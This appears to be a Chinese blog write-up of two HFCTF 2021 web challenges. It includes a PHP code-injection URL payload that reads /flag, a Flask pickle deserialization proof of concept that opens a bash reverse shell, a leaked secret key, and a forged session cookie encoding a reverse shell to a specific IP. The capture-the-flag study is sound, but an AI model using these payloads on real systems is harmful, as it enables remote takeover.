HFCTF2021复现

最新推荐文章于 2023-07-06 17:11:55 发布
最新推荐文章于 2023-07-06 17:11:55 发布
阅读量1.1k 收藏 1
点赞数 2
分类专栏: Write Up 文章标签: flask python 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Little_jcak/article/details/123516439
版权

[HFCTF2021 Quals]Unsetme

1、F3框架,unset将参数a拼接进去,可以闭合

在这里插入图片描述

2、测试

​ payload

?a=a%0a);%0aphpinfo(

在这里插入图片描述

3、读取flag

?a=a%0a);%0aecho file_get_contents(%27/flag%27

在这里插入图片描述

[HFCTF 2021 Final]easyflask

1、源码,很明显的pickle反序列化

pickle官方文档

#!/usr/bin/python3.6
import os
import pickle

from base64 import b64decode
from flask import Flask, request, render_template, session

app = Flask(__name__)
app.config["SECRET_KEY"] = "*******"

User = type('User', (object,), {
    'uname': 'test',
    'is_admin': 0,
    '__repr__': lambda o: o.uname,
})


@app.route('/', methods=('GET',))
def index_handler():
    if not session.get('u'):
        u = pickle.dumps(User())
        session['u'] = u
    return "/file?file=index.js"


@app.route('/file', methods=('GET',))
def file_handler():
    path = request.args.get('file')
    path = os.path.join('static', path)
    if not os.path.exists(path) or os.path.isdir(path) \
            or '.py' in path or '.sh' in path or '..' in path or "flag" in path:
        return 'disallowed'

    with open(path, 'r') as fp:
        content = fp.read()
    return content


@app.route('/admin', methods=('GET',))
def admin_handler():
    try:
        u = session.get('u')
        if isinstance(u, dict):
            u = b64decode(u.get('b'))
        u = pickle.loads(u)
    except Exception:
        return 'uhh?'

    if u.is_admin == 1:
        return 'welcome, admin'
    else:
        return 'who are you?'


if __name__ == '__main__':
    app.run('0.0.0.0', port=80, debug=False)

2、读取secret_key

/proc/self/environ下读取

/file?file=/proc/self/environ

在这里插入图片描述

3、利用反序列化与伪造session

构造反序列化poc,注意要在linux系统下运行,因为pickle在windows和linux下生成的序列化字符不一样

import pickle
from base64 import b64encode
import os

User = type('User', (object,), {
    'uname': 'tyskill',
    'is_admin': 0,
    '__repr__': lambda o: o.uname,
    '__reduce__': lambda o: (os.system, ("bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'",))
})
u = pickle.dumps(User())
print(b64encode(u).decode())

伪造session,用flask_session_cookie_manager

python3 flask_session_cookie_manager3.py encode -s 'glzjin22948575858jfjfjufirijidjitg3uiiuuh' -t "{'u':{'b':'Y3Bvc2l4CnN5c3RlbQpwMAooUyJiYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEyNC4yMjIuMTcwLjI0MS84ODg4IDA+JjEnIgpwMQp0cDIKUnAzCi4='}}"

在这里插入图片描述

Y3pro
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
OPINIONDIGEST
07-27
OPINIONDIGEST
图像处理(第二版)章毓晋
10-08
第1章导论.................................................................................................................................. 1 1.0.1 为什么要处理图像?.........................................................................................1 1.0.2 什么是一幅图像?.............................................................................................1 1.0.3 什么是一幅数字图像?.....................................................................................1 1.0.4 什么是一个光谱带?.........................................................................................1 1.0.5 为什么大多数图像处理算法都参照灰度图像进行,而实际中遇到的都是彩色图像?.....................................................................................2 1.0.6 一幅数字图像是如何形成的?.........................................................................2 1.0.7 如果一个传感器对应物理世界中的一个小片,如何能让多个传感器对应场景中的同一个小片?.................................................................2 1.0.8 什么是图像中一个像素位置亮度的物理含义?............................................3 1.0.9 为什么图像常用512×512,256×256,128×128 等来表示?........................4 1.0.10 需要多少个比特以存储一幅图像?...............................................................5 1.0.11 什么决定了一幅图像的质量?.......................................................................5 1.0.12 什么会使得图像模糊?...................................................................................5 1.0.13 图像分辨率是什么含义?...............................................................................5 1.0.14 “良好对比度”是什么含义?.........................................................................7 1.0.15 图像处理的目的是什么?...............................................................................8 1.0.16 如何进行图像处理?.......................................................................................8 1.0.17 图像处理中使用非线性操作符吗?...............................................................9 1.0.18 什么是线性操作符?.......................................................................................9 1.0.19 如何来定义线性操作符?.......................................................................
BUUCTF刷题记录[HFCTF2020]BabyUpload——涉及session反序列化
u013119911的博客
06-30 1521
点开就是源代码,直接进行代码审计
[HFCTF 2021 Final]easyflask
SopRomeo的博客
04-29 5202
最近看到buu上了几个新题拿一个做做 按照提示得到源码 有个SECRET_KEY 还有个文件读取,这边禁用了黑名单,用绝对路径直接读/proc/self/environ试试 找到秘钥 glzjin22948575858jfjfjufirijidjitg3uiiuuh 继续看源码 下面有个反序列化的操作,思路不难了,pickle反序列化RCE 最好全程都在liunx环境下进行 import pickle from base64 import b64encode import os User = ty
虎符ctf2021 web writeup
weixin_45805993的博客
04-09 794
1.签到 https://github.com/php/php-src/commit/c730aa26bd52829a49f2ad284b181b7e82a68d7d php git仓库后门 2.unsetme 源码 <?php // Kickstart the framework $f3=require('lib/base.php'); $f3->set('DEBUG',0); if ((float)PCRE_VERSION<8.0) trigger_error('PCRE v
session.upload_progress文件包含
Aiwin的博客
05-29 800
session.upload_progress文件包含
2021[HFCTF]虎符杯网络安全赛道re部分wp
n1ptune__的博客
04-07 1282
CrackMe 这题是使用c++写的,因为无符号表,ida对c++的解析不是很友好,可以去了解一下c++的string类型的结构,对解题很有帮助,推荐看这篇文章链接: https://bbs.pediy.com/thread-230312.htm. 程序先将长度为17位的输入分为7位和10位两部分 再输入一个数要求满足一定条件 直接爆破 #include <stdio.h> #include <stdlib.h> #include <math.h> double f
CTFSHOW国赛-----Unzip(软连接利用)
qq_73767109的博客
06-04 1878
因为解压的目录更改了,所以要把解压文件所在目录放在var/www/html(因为html目录下是web环境)这样才能在解压shell文件时实getshell。这里利用linux构造软连接使得上传文件指向到var/www/html目录下。接下来就是在var/www/html目录下上传一个shell文件就可以了。再上传该压缩包,因为解压后的目录同名所以会覆盖原指定目录。所以此时目录是var/www/html/cmd.php。在test的目录下创建一句话php文件。--symlinks表示压缩软连接。
[BUUCTF-n1book][第二章 web进阶]SSRF Training
nareku的博客
07-24 704
随便看看,发了源码先代码审计(又臭又长的代码审计好讨厌捏…)限制了协议和ip地址。这里忽略了paerse_url()和curl同时处理url的差异,因此我们可以差异来进行绕过。前面已经测试过parse_url()函数得到如下结果可以看到parse_url是以www.baidu.com为目标的那么整理一下代码逻辑就是先检测是否为内网ip,通过parse_url,最后通过curl来完成请求。那么绕过方法就是让parse_url来处理外部ip,curl来处理内网ip。...
[HFCTF 2022]两道web题目wp
cosmoslin的博客
03-28 6620
ezphp <?php (empty($_GET["env"])) ? highlight_file(__FILE__) : putenv($_GET["env"]) && system('echo hfctf2022');?> 看到这段代码不难联想到P神的博客 我是如何利用环境变量注入执行任意命令 题目给了一个docker用于本地搭建环境,可以发题目用的系统环境为debian。在debian系操作系统中,sh指向dash;在centos系操作系统中,sh指向bash。 由于
论文-深度补全算法
03-10
1、传统深度不全算法 2、详细内容可见:https://blog.csdn.net/qq_43627520/article/details/123344654?spm=1001.2014.3001.5502 3、代码可直接运行、包含有测试用例、以及验证代码
HFCTF学习JWT伪造
蚁景网安学院
04-23 1185
刚打完比赛,来总结下
2020巅峰极客Web题---Easy Flask
李熠专用博客_白帽子一枚,人称低危终结者
09-28 1638
看标题,猜测改网站用的事Flask框架,搜索引擎一搜,发Flask存在模板注入漏洞: 于是大概可以推测,题目应该考察的是模板注入漏洞。 打开题目网址,有个登录页面,输入用户名,进入下面的页面: ...
[HFCTF2020]JustEscape 记录
SopRomeo的博客
09-16 1842
最近开学一堆屁事,电脑 又发疯。。。 佛了 抓个包瞅瞅 计算的时候注意将计算符号进行url编码 再传入new date会显示当前时间
hfctf_2020_sucurebox(0地址引用)
seaaseesa的博客
06-11 557
hfctf_2020_sucurebox(0地址引用) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,在add功能里,size的判断不准确,导致size可以很大,使得malloc(size)返回0,但是没有检查malloc的返回值 然后,edit功能里可以指定offset和len,这样,我们就能在整个内存里进行读写了。 #coding:utf8 from pwn import * #sh = process('./hfctf_2020_sucurebox') sh = r
[HFCTF 2021] final web
weixin_63231007的博客
07-06 621
flasksession伪造&pickle反序列化 + Laravel&phar反序列化 + exp()溢出盲注
CVE-2021-28041
最新发布
03-13
由于我无法得知你具体指的是哪个软件或系统的CVE-2021-28041漏洞,因此无法提供具体的步骤。但是,我可以给你一些一般性的漏洞的方法和建议。 要CVE-2021-28041漏洞,通常需要以下步骤: 1. 确定受...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值